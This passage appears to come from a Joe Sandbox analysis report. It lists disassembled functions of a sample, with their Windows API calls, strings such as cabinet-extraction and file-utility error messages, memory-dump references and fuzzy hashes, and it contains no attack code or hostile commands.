Instruction ID: 01623c04c7dd3cd0e362544bf652e70e74c84c2faf7a6874d2cec4c0195004c1
Opcode Fuzzy Hash: 4bf76563a6340c144d38d822bce8de24cf3b57a84f938c8bbdf66edf7491c589
Instruction Fuzzy Hash: B1119636941626FBDB209BA99C09E9E7F68BF05B30F154257F920F72D0E7709D009790

Function 005D32F3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005D3309
SysAllocString.OLEAUT32(?), ref: 005D3325
VariantClear.OLEAUT32(?), ref: 005D33AC
SysFreeString.OLEAUT32(00000000), ref: 005D33B7

Strings

xmlutil.cpp, xrefs: 005D333C
`Dv, xrefs: 005D33B7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `Dv$xmlutil.cpp
API String ID: 760788290-2876128059
Opcode ID: cc7943f8bb791dae614895e61afc6954127a4fa0703325f218ff4ff8d56686bb
Instruction ID: c3e038516702d589b45e78c580d057261b8505c9bf16d6be40688811597899a5
Opcode Fuzzy Hash: cc7943f8bb791dae614895e61afc6954127a4fa0703325f218ff4ff8d56686bb
Instruction Fuzzy Hash: D5217E31901219EBCB21DB98C948EAEBFB9BF84711F15095AF901AB310DB319E04DB92

Function 005D0879 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,?,005953BD,00000000,?,?,?,?,?,?,?,005A769D,00000000), ref: 005D0897
GetLastError.KERNEL32(?,?,?,?,?,?,?,005A769D,00000000), ref: 005D08A1
GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,005A769D,00000000), ref: 005D08D3
GetLastError.KERNEL32(?,?,?,?,?,?,?,005A769D,00000000), ref: 005D08EC
CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,005A769D,00000000), ref: 005D092B

Strings

procutil.cpp, xrefs: 005D0919

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLastToken$CloseHandleInformationOpenProcess
String ID: procutil.cpp
API String ID: 4040495316-1178289305
Opcode ID: 183755e5c4d1b062b8ec07cf5e9038c9cf5e15e366738a3d6b1701a3475ad382
Instruction ID: 34f229fee520e3dce022f8ee210bb7764844d6903a091b9595d0a99838982e6e
Opcode Fuzzy Hash: 183755e5c4d1b062b8ec07cf5e9038c9cf5e15e366738a3d6b1701a3475ad382
Instruction Fuzzy Hash: 47219232D41229EBEB319B998809B9EBFA8FF14711F124157AD14AB390D3708E04ABD0

Function 005A6B13 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 005A6B49
CloseHandle.KERNEL32(00000000), ref: 005A6BB9

Strings

burn.filehandle.self, xrefs: 005A6B5A, 005A6B8C
%ls -%ls=%u, xrefs: 005A6B61, 005A6B93
Failed to append the file handle to the obfuscated command line., xrefs: 005A6BA7
Failed to append the file handle to the command line., xrefs: 005A6B75

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
API String ID: 3498533004-3263533295
Opcode ID: 914c7163c156964bb12ebec802711aa041f397f7f57d48603dd710e7f21e622d
Instruction ID: c88359c151c7763f4b67481cb0b0b964f137cb9ca0ea0db7737e3dab3737fb9e
Opcode Fuzzy Hash: 914c7163c156964bb12ebec802711aa041f397f7f57d48603dd710e7f21e622d
Instruction Fuzzy Hash: A811E632601618BFDB205A68CC49FAF7FA9FB46B34F054352FD24EB2E1E370481196A1

Function 005D3565 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 005D3574
InterlockedIncrement.KERNEL32(005FB6C8), ref: 005D3591
CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,005FB6B8,?,?,?,?,?,?), ref: 005D35AC
CLSIDFromProgID.OLE32(MSXML.DOMDocument,005FB6B8,?,?,?,?,?,?), ref: 005D35B8

Strings

MSXML.DOMDocument, xrefs: 005D35B3
Msxml2.DOMDocument, xrefs: 005D35A7

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: d7c3e9387ddf1d24c403ce7bb82c48ad42981ff12e6a7245e6c1a1c11f0cdfed
Instruction ID: 1ae25328af7d4315c9410ddd00c4d2303907e6db46fd21b7a0020c26522de443
Opcode Fuzzy Hash: d7c3e9387ddf1d24c403ce7bb82c48ad42981ff12e6a7245e6c1a1c11f0cdfed
Instruction Fuzzy Hash: 94F0A030742139D7E7301B6ABD08B262F66FBA1F55F05082BE900C2264D3A4C945A6B3

Function 005D4A6C Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 99memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 005D4A9D
GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 005D4ACA
GetLastError.KERNEL32(?,00000000,?,00000000), ref: 005D4AF6
GetLastError.KERNEL32(00000000,005DB7A0,?,00000000,?,00000000,?,00000000), ref: 005D4B34
GlobalFree.KERNEL32(00000000), ref: 005D4B65

Strings

fileutil.cpp, xrefs: 005D4AB8, 005D4B11

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$Global$AllocFree
String ID: fileutil.cpp
API String ID: 1145190524-2967768451
Opcode ID: c1dfcd2fe7000264e5ab3ef9c7587a3e7937408650630fc7ed0985c82abd25d5
Instruction ID: 05f95f975a5a0d83ef6c3099bd516da121e8299c1438d2d4d789804d45617971
Opcode Fuzzy Hash: c1dfcd2fe7000264e5ab3ef9c7587a3e7937408650630fc7ed0985c82abd25d5
Instruction Fuzzy Hash: E0319036A41229ABDB319A998C41BABBEA9BF94750F114157ED14E7340D730DD009AD4

Function 005B0A81 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 005B0B27
GetLastError.KERNEL32(?,?,?), ref: 005B0B31

Strings

cabextract.cpp, xrefs: 005B0B55
Failed to move file pointer 0x%x bytes., xrefs: 005B0B62
Invalid seek type., xrefs: 005B0ABD

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 6ddfd583b7fa64075ee5fc18d200e6ce31df60733f240341f520cf455c4fa3dc
Instruction ID: 55599f9ef0ec249ab127343b0d939bfa97da56375a6811e536f7794226b3484c
Opcode Fuzzy Hash: 6ddfd583b7fa64075ee5fc18d200e6ce31df60733f240341f520cf455c4fa3dc
Instruction Fuzzy Hash: 7431AF32A4061AEFCB15DFA8C884EAEBB69FB04724B148626F91497291D330FD108B90

Function 00594115 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,005AA0E8,00000000,00000000,?,00000000,005953BD,00000000,?,?,0059D5B5,?), ref: 00594123
GetLastError.KERNEL32(?,005AA0E8,00000000,00000000,?,00000000,005953BD,00000000,?,?,0059D5B5,?,00000000,00000000), ref: 00594131
CreateDirectoryW.KERNEL32(?,840F01E8,00595489,?,005AA0E8,00000000,00000000,?,00000000,005953BD,00000000,?,?,0059D5B5,?,00000000), ref: 0059419A
GetLastError.KERNEL32(?,005AA0E8,00000000,00000000,?,00000000,005953BD,00000000,?,?,0059D5B5,?,00000000,00000000), ref: 005941A4

Strings

dirutil.cpp, xrefs: 005941D4

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID: dirutil.cpp
API String ID: 1375471231-2193988115
Opcode ID: e59374a89daa9d254f589cc5567381ff4f300319283b25f8eac64287f01fcbb9
Instruction ID: d27fe2c272b39cdc25bd9da884d29b1156d4ed936bdb63d1995632ea64110d3f
Opcode Fuzzy Hash: e59374a89daa9d254f589cc5567381ff4f300319283b25f8eac64287f01fcbb9
Instruction Fuzzy Hash: 0011D22660173696EF311AA58C45F3BAE55FF75B61F124022FD04EA240E3608D82FA91

Function 005956A9 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00596595,00596595,?,0059563D,?,?,00000000), ref: 005956E5
GetLastError.KERNEL32(?,0059563D,?,?,00000000,?,?,00596595,?,00597F02,?,?,?,?,?), ref: 00595714

Strings

variable.cpp, xrefs: 00595738
version.dll, xrefs: 005956D7
Failed to compare strings., xrefs: 00595742

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: CompareErrorLastString
String ID: Failed to compare strings.$variable.cpp$version.dll
API String ID: 1733990998-4228644734
Opcode ID: a772a6b745766a9f466075def949cb10879fdcd2a0eaf502a848387cf4f70d27
Instruction ID: 1f1318536f9886b9d382511915d70f5687135da5a118af076c667c96072f329c
Opcode Fuzzy Hash: a772a6b745766a9f466075def949cb10879fdcd2a0eaf502a848387cf4f70d27
Instruction Fuzzy Hash: CD210736651925EBCF118FD8CD45A59BFA4FB457A0B21031AE924AB390F630DF119790

Function 005D0A28 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00594F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 005D0A38
GetLastError.KERNEL32(?,?,00594F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 005D0A46
GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 005D0A8B
GetLastError.KERNEL32(?,?,00594F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 005D0A95

Strings

procutil.cpp, xrefs: 005D0A6A

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectProcessSingleWait
String ID: procutil.cpp
API String ID: 590199018-1178289305
Opcode ID: ddb65b468d01fce2b55afe841a2a75ed9746dff6316bc6184cf31041fe001486
Instruction ID: ee71098653382f0941f05d3dfeb1f991ea1954249220c540f6f172e808d3c4b9
Opcode Fuzzy Hash: ddb65b468d01fce2b55afe841a2a75ed9746dff6316bc6184cf31041fe001486
Instruction Fuzzy Hash: 67117037D42736E7DB309B988908BAE7EA5FB04B60F124257ED54AB3C0D2348D00A6D5

Function 005B09EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 005B140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,005B0A19,?,?,?), ref: 005B1434
Part of subcall function 005B140C: GetLastError.KERNEL32(?,005B0A19,?,?,?), ref: 005B143E

ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 005B0A27
GetLastError.KERNEL32 ref: 005B0A31

Strings

cabextract.cpp, xrefs: 005B0A55
Failed to read during cabinet extraction., xrefs: 005B0A5F

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLast$PointerRead
String ID: Failed to read during cabinet extraction.$cabextract.cpp
API String ID: 2170121939-2426083571
Opcode ID: 7ea99d0ce0909a009bbd14841ada3a5d430774a42ba074e6aae634333fe1ad46
Instruction ID: 96f78afee03ccf5c28839c6aee1e34184fc4c55b6468fb4fdd9b44a7d375599a
Opcode Fuzzy Hash: 7ea99d0ce0909a009bbd14841ada3a5d430774a42ba074e6aae634333fe1ad46
Instruction Fuzzy Hash: 2A11CE36A0126AFBCB219FA5DC08E9F7F69FB48760B014556FD04A7290C730A910D7D0

Function 005B140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,005B0A19,?,?,?), ref: 005B1434
GetLastError.KERNEL32(?,005B0A19,?,?,?), ref: 005B143E

Strings

Failed to move to virtual file pointer., xrefs: 005B146C
cabextract.cpp, xrefs: 005B1462

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move to virtual file pointer.$cabextract.cpp
API String ID: 2976181284-3005670968
Opcode ID: 8c000fe5af2e814f051844f550ea6fe917f524d4eda980c5abc58444d9e54a1f
Instruction ID: 443a87bef7f998c0c2769439b1105510c4d35627b10c9798d0d138ca9df77418
Opcode Fuzzy Hash: 8c000fe5af2e814f051844f550ea6fe917f524d4eda980c5abc58444d9e54a1f
Instruction Fuzzy Hash: 1301A737941A36B7DB215A968C08ADBBF15FF407707118126FD1856151DB31AC10D7D8

Function 005D3EDD Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 005D3F73
GetLastError.KERNEL32 ref: 005D3FD6

Strings

fileutil.cpp, xrefs: 005D3FFA

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
Opcode ID: b20a590fc9e55df9d02d0689bb4492ababdde85244c87c5aeabf6e573008b496
Instruction ID: 7be7ce6de9445747696ecf33726afd92eb2f954eb78665707dcc1f5618719e52
Opcode Fuzzy Hash: b20a590fc9e55df9d02d0689bb4492ababdde85244c87c5aeabf6e573008b496
Instruction Fuzzy Hash: 6F314E71E0026E9BDB318F59C9847EA7BB4FB44751F0040A7EA48E7340D7B89EC49A96

Function 005D4E3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,005D3F9A,?,?,?), ref: 005D4E5E
GetLastError.KERNEL32(?,?,005D3F9A,?,?,?), ref: 005D4E68

Strings

fileutil.cpp, xrefs: 005D4E91

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: fileutil.cpp
API String ID: 442123175-2967768451
Opcode ID: a430c4adaccf716defab688ba861e31a44d9494520a85342932fadb2f2a34a51
Instruction ID: 8ba5367e804db3179943070914397de6e37a2e5016b4a78316edf5de8a4f7ce1
Opcode Fuzzy Hash: a430c4adaccf716defab688ba861e31a44d9494520a85342932fadb2f2a34a51
Instruction Fuzzy Hash: 6EF0FB33A01229BBDB209A9A9D45AAFBB6DFB54761F110217FD04D7240D771AA009AE2

Function 005D490D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,005A8770,00000000,00000000,00000000,00000000,00000000), ref: 005D4925
GetLastError.KERNEL32(?,?,?,005A8770,00000000,00000000,00000000,00000000,00000000), ref: 005D492F

Strings

fileutil.cpp, xrefs: 005D4953

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: fileutil.cpp
API String ID: 2976181284-2967768451
Opcode ID: 65f38aa25cb6d4ebdeb918fc29a2db9b66fceb4d74e66f1f7d958f51de917091
Instruction ID: a633124bcae4a7ac6b37cb25e460abbd0c6bb1a750461d770be69ab50ab26690
Opcode Fuzzy Hash: 65f38aa25cb6d4ebdeb918fc29a2db9b66fceb4d74e66f1f7d958f51de917091
Instruction Fuzzy Hash: E1F0627660112DAB9B208F89DD09AAB7FA8FB04760B014157BD4497310E731DD109BE0

Function 00593838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00593877
GetLastError.KERNEL32 ref: 00593881
LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 005938EA

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: DirectoryErrorLastLibraryLoadSystem
String ID:
API String ID: 1230559179-0
Opcode ID: 699e0f6da52a36be44aeb153aed3f9dc18c990dead15de80da92a8297b3e3638
Instruction ID: bcbffa5ea90837d8d64e0de0e5960ffecf1ed353b98ad6af42e9fb4403f0a3f0
Opcode Fuzzy Hash: 699e0f6da52a36be44aeb153aed3f9dc18c990dead15de80da92a8297b3e3638
Instruction Fuzzy Hash: 0F21C1B2D0222DE7DF209B659C49F9A7BA8BB44710F1101A6FE14E7241EA70DE449790

Function 00593A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00593BB6,00000000,?,00591474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005913B8), ref: 00593A20
RtlFreeHeap.NTDLL(00000000,?,00593BB6,00000000,?,00591474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005913B8,000001C7,00000100), ref: 00593A27
GetLastError.KERNEL32(?,00593BB6,00000000,?,00591474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005913B8,000001C7,00000100,?), ref: 00593A31

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Heap$ErrorFreeLastProcess
String ID:
API String ID: 406640338-0
Opcode ID: c74690f542ff5c25b20639e50c4a962370f3a594125de78a333aeffc2f6a97d8
Instruction ID: bbb9173a5ce8ff16bbb5dca32951250df3f8a278a3d4acc727df1d59eb6a3ee7
Opcode Fuzzy Hash: c74690f542ff5c25b20639e50c4a962370f3a594125de78a333aeffc2f6a97d8
Instruction Fuzzy Hash: 9CD01273A05139DB973117E69C5C95B7F99EF15BA1B020127FD44D6220D725CD00E6E4

Function 005D0F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,005FAAA0,00000000,?,005D57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 005D0F80

Strings

regutil.cpp, xrefs: 005D0FC3

Memory Dump Source

Source File: 00000000.00000002.2270078119.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2270062429.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270107152.00000000005DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270127837.00000000005FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2270143594.00000000005FD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_UolJwovI8c.jbxd

Similarity

API ID: Open
String ID: regutil.cpp
API String ID: 71445658-955085611
Opcode ID: 554af8490685eaf4a8d70e6d70a261126ea6433c75a11ffdbb6e3a0839117f13
Instruction ID: ce5446b8ee1dc14ffcd7e842980eee9786c6f4eb8c4be5826e23213e6a0d7c3b
Opcode Fuzzy Hash: 554af8490685eaf4a8d70e6d70a261126ea6433c75a11ffdbb6e3a0839117f13
Instruction Fuzzy Hash: BFF0F633A01237A69F30575E8C05B7BAE49FB947B0F355527BD46DA3D0E6218C00A6F0

Function 005D35C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005D35F8

Part of subcall function 005D304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,005D3609,00000000,?,00000000), ref: 005D3069
Part of subcall function 005D304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,005BC025,?,00595405,?,00000000,?), ref: 005D3075

Memory Dump Source

